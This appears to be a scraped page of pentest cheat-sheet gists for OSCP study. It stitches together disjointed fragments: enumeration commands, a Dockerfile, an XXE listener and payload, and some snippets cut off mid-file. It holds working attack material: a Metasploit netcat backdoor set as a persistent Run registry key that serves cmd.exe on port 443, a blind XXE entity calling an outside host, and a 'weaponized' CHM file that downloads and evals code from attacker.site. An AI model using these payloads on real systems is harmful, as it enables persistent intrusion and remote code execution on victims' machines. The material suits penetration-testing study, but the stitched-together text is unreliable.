JPMonglis
OSCP Handy Commands
Nmap Full Web Vulnerability Scan:
mkdir /usr/share/nmap/scripts/vulscan
cd /usr/share/nmap/scripts/vulscan
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
## msf netcat backdoor persistence
- netcat is included in metasploit
- upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 ## must have system rights
- ## registry key adding
- echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run
- echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
- echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc
eCPPT NETWORK SECURITY
*DNS Enumeration
nslookup example.com
nslookup -query=mx domain
nslookup -query=ns domain
nslookup -query=any domain
interactive mode {
How to pass the OSCP
Recon
Find vuln
Exploit
Document it
Recon
Unicornscan in the CLI, nmap in msfconsole to help store loot in the database.
TCP
unicornscan -i tap0 -I -mT $IP:a
Penetration Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tips and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole.
Reconnaissance
Passive/Semi-Passive
Tools
Discover - https://github.com/leebaird/discover
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
#!/usr/bin/env python
from __future__ import print_function
import socket
# Listen on all interfaces so the out-of-band XXE callback can reach this host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 2121))
s.listen(1)
print('XXE-FTP listening ')
conn, addr = s.accept()
print('Connected by %s' % (addr,))
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs
JPMonglis / wcf.txt
Created March 11, 2019 21:19
weaponize a CHM file
<!DOCTYPE html><html><head><title>Click Me</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://attacker.site/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();